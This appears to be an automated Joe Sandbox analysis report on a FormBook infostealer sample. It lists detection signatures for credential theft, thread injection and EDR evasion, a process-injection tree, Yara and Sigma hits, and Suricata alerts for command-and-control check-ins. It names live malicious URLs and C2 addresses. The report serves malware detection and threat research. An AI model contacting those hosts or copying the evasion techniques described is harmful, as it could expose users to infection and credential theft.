Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe

Overview

General Information

Sample name:F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe
renamed because original name is a hash value
Original sample name:FYAT STE LSTE.exe
Analysis ID:1633359
MD5:00435d0f848d07fdd073d36deadb3325
SHA1:df7b77d2c260c82a526051d9562f9cbb3c762e79
SHA256:d60cfe449d93ba39befc0665d74ba3d56c90dcf8ccc14521907e3248d00954d5
Tags:exegeoTURuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe" MD5: 00435D0F848D07FDD073D36DEADB3325)
    • svchost.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • uD8F5JGUDvEpNoCYQYtn.exe (PID: 6120 cmdline: "C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\5QQLa49ept.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • reg.exe (PID: 4168 cmdline: "C:\Windows\SysWOW64\reg.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • uD8F5JGUDvEpNoCYQYtn.exe (PID: 356 cmdline: "C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\mFe7Rma2a.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7464 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", CommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", ParentImage: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, ParentProcessId: 7092, ParentProcessName: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, ProcessCommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", ProcessId: 6620, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", CommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", ParentImage: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, ParentProcessId: 7092, ParentProcessName: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, ProcessCommandLine: "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe", ProcessId: 6620, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-10T09:27:00.485127+010028554651A Network Trojan was detected192.168.2.104969147.239.127.20780TCP
                2025-03-10T09:27:26.070107+010028554651A Network Trojan was detected192.168.2.1049695208.91.197.2780TCP
                2025-03-10T09:27:39.681408+010028554651A Network Trojan was detected192.168.2.1049700188.114.96.380TCP
                2025-03-10T09:27:53.294795+010028554651A Network Trojan was detected192.168.2.1049704162.254.32.7780TCP
                2025-03-10T09:28:06.612704+010028554651A Network Trojan was detected192.168.2.1049708188.114.97.380TCP
                2025-03-10T09:28:19.815451+010028554651A Network Trojan was detected192.168.2.1049712199.59.243.22880TCP
                2025-03-10T09:28:33.211299+010028554651A Network Trojan was detected192.168.2.1049716172.67.169.18980TCP
                2025-03-10T09:28:46.752986+010028554651A Network Trojan was detected192.168.2.104972052.223.13.4180TCP
                2025-03-10T09:29:00.183805+010028554651A Network Trojan was detected192.168.2.1049724104.21.50.21980TCP
                2025-03-10T09:29:14.529498+010028554651A Network Trojan was detected192.168.2.1049728154.201.91.24680TCP
                2025-03-10T09:29:30.511811+010028554651A Network Trojan was detected192.168.2.1049732208.91.197.2780TCP
                2025-03-10T09:29:44.174126+010028554651A Network Trojan was detected192.168.2.104973613.248.169.4880TCP
                2025-03-10T09:30:00.342313+010028554651A Network Trojan was detected192.168.2.104974013.248.169.4880TCP
                2025-03-10T09:30:13.766264+010028554651A Network Trojan was detected192.168.2.104974452.223.13.4180TCP
                2025-03-10T09:30:26.981353+010028554651A Network Trojan was detected192.168.2.1049748199.59.243.22880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-10T09:27:16.301902+010028554641A Network Trojan was detected192.168.2.1049692208.91.197.2780TCP
                2025-03-10T09:27:18.845170+010028554641A Network Trojan was detected192.168.2.1049693208.91.197.2780TCP
                2025-03-10T09:27:21.388663+010028554641A Network Trojan was detected192.168.2.1049694208.91.197.2780TCP
                2025-03-10T09:27:32.022057+010028554641A Network Trojan was detected192.168.2.1049697188.114.96.380TCP
                2025-03-10T09:27:34.583056+010028554641A Network Trojan was detected192.168.2.1049698188.114.96.380TCP
                2025-03-10T09:27:37.141008+010028554641A Network Trojan was detected192.168.2.1049699188.114.96.380TCP
                2025-03-10T09:27:45.647416+010028554641A Network Trojan was detected192.168.2.1049701162.254.32.7780TCP
                2025-03-10T09:27:48.181479+010028554641A Network Trojan was detected192.168.2.1049702162.254.32.7780TCP
                2025-03-10T09:27:50.746602+010028554641A Network Trojan was detected192.168.2.1049703162.254.32.7780TCP
                2025-03-10T09:27:58.943135+010028554641A Network Trojan was detected192.168.2.1049705188.114.97.380TCP
                2025-03-10T09:28:01.495915+010028554641A Network Trojan was detected192.168.2.1049706188.114.97.380TCP
                2025-03-10T09:28:04.034244+010028554641A Network Trojan was detected192.168.2.1049707188.114.97.380TCP
                2025-03-10T09:28:12.180821+010028554641A Network Trojan was detected192.168.2.1049709199.59.243.22880TCP
                2025-03-10T09:28:14.715956+010028554641A Network Trojan was detected192.168.2.1049710199.59.243.22880TCP
                2025-03-10T09:28:17.273296+010028554641A Network Trojan was detected192.168.2.1049711199.59.243.22880TCP
                2025-03-10T09:28:25.551761+010028554641A Network Trojan was detected192.168.2.1049713172.67.169.18980TCP
                2025-03-10T09:28:28.107060+010028554641A Network Trojan was detected192.168.2.1049714172.67.169.18980TCP
                2025-03-10T09:28:30.653960+010028554641A Network Trojan was detected192.168.2.1049715172.67.169.18980TCP
                2025-03-10T09:28:38.978134+010028554641A Network Trojan was detected192.168.2.104971752.223.13.4180TCP
                2025-03-10T09:28:41.527359+010028554641A Network Trojan was detected192.168.2.104971852.223.13.4180TCP
                2025-03-10T09:28:44.088560+010028554641A Network Trojan was detected192.168.2.104971952.223.13.4180TCP
                2025-03-10T09:28:52.492697+010028554641A Network Trojan was detected192.168.2.1049721104.21.50.21980TCP
                2025-03-10T09:28:55.080013+010028554641A Network Trojan was detected192.168.2.1049722104.21.50.21980TCP
                2025-03-10T09:28:57.616285+010028554641A Network Trojan was detected192.168.2.1049723104.21.50.21980TCP
                2025-03-10T09:29:06.845759+010028554641A Network Trojan was detected192.168.2.1049725154.201.91.24680TCP
                2025-03-10T09:29:09.439705+010028554641A Network Trojan was detected192.168.2.1049726154.201.91.24680TCP
                2025-03-10T09:29:11.990702+010028554641A Network Trojan was detected192.168.2.1049727154.201.91.24680TCP
                2025-03-10T09:29:20.332948+010028554641A Network Trojan was detected192.168.2.1049729208.91.197.2780TCP
                2025-03-10T09:29:23.794020+010028554641A Network Trojan was detected192.168.2.1049730208.91.197.2780TCP
                2025-03-10T09:29:26.330540+010028554641A Network Trojan was detected192.168.2.1049731208.91.197.2780TCP
                2025-03-10T09:29:36.039746+010028554641A Network Trojan was detected192.168.2.104973313.248.169.4880TCP
                2025-03-10T09:29:38.601872+010028554641A Network Trojan was detected192.168.2.104973413.248.169.4880TCP
                2025-03-10T09:29:41.312804+010028554641A Network Trojan was detected192.168.2.104973513.248.169.4880TCP
                2025-03-10T09:29:49.729285+010028554641A Network Trojan was detected192.168.2.104973713.248.169.4880TCP
                2025-03-10T09:29:52.288435+010028554641A Network Trojan was detected192.168.2.104973813.248.169.4880TCP
                2025-03-10T09:29:54.807253+010028554641A Network Trojan was detected192.168.2.104973913.248.169.4880TCP
                2025-03-10T09:30:06.047253+010028554641A Network Trojan was detected192.168.2.104974152.223.13.4180TCP
                2025-03-10T09:30:08.647171+010028554641A Network Trojan was detected192.168.2.104974252.223.13.4180TCP
                2025-03-10T09:30:11.193357+010028554641A Network Trojan was detected192.168.2.104974352.223.13.4180TCP
                2025-03-10T09:30:19.926367+010028554641A Network Trojan was detected192.168.2.1049745199.59.243.22880TCP
                2025-03-10T09:30:21.853590+010028554641A Network Trojan was detected192.168.2.1049746199.59.243.22880TCP
                2025-03-10T09:30:24.421504+010028554641A Network Trojan was detected192.168.2.1049747199.59.243.22880TCP
                2025-03-10T09:30:32.961191+010028554641A Network Trojan was detected192.168.2.1049749103.224.182.24280TCP
                2025-03-10T09:30:35.481613+010028554641A Network Trojan was detected192.168.2.1049750103.224.182.24280TCP
                2025-03-10T09:30:38.532520+010028554641A Network Trojan was detected192.168.2.1049751103.224.182.24280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.mylivingbio.online/dj43/Avira URL Cloud: Label: malware
                Source: http://www.maxank.top/esrt/Avira URL Cloud: Label: malware
                Source: http://www.full4movies.christmas/eg1u/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeVirustotal: Detection: 36%Perma Link
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeReversingLabs: Detection: 50%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1257841114.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3581016954.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1258855778.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1123779592.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125102326.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1159403940.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1161483061.0000000003800000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1264498684.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.0000000003460000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1258534996.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1123779592.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000003.1125102326.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1258295138.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1159403940.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1258295138.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1161483061.0000000003800000.00000004.00000020.00020000.00000000.sdmp, reg.exe, reg.exe, 00000004.00000003.1264498684.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.0000000003460000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581100186.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000004.00000003.1258534996.00000000030F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: reg.pdb source: svchost.exe, 00000002.00000003.1226391540.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1226340558.000000000341A000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1645977314.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1197869789.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.0000000003A8C000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000034DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1570677755.0000000034DBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: reg.exe, 00000004.00000002.3579738318.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.0000000003A8C000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000034DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1570677755.0000000034DBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: reg.pdbGCTL source: svchost.exe, 00000002.00000003.1226391540.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1226340558.000000000341A000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1645977314.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000003.1197869789.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182664077.0000000000FFF000.00000002.00000001.01000000.00000004.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1341897315.0000000000FFF000.00000002.00000001.01000000.00000004.sdmp
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_001F445A
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC6D1 FindFirstFileW,FindClose,0_2_001FC6D1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_001FC75C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001FEF95
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001FF0F2
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001FF3F3
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001F37EF
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001F3B12
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001FBCBC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C6C640 FindFirstFileW,FindNextFileW,FindClose,4_2_02C6C640
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then xor eax, eax4_2_02C59F80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then pop edi4_2_02C5E271
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4x nop then mov ebx, 00000004h4_2_032A04F8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49691 -> 47.239.127.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49709 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49712 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49695 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49703 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49694 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49700 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49741 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49733 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49706 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49737 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49740 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49744 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49720 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49725 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49708 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49718 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49715 -> 172.67.169.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49717 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49701 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49707 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49713 -> 172.67.169.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49693 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49739 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49746 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49705 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49702 -> 162.254.32.77:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49716 -> 172.67.169.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49692 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49697 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49719 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49710 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49699 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49726 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49727 -> 154.201.91.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49698 -> 188.114.96.3:80
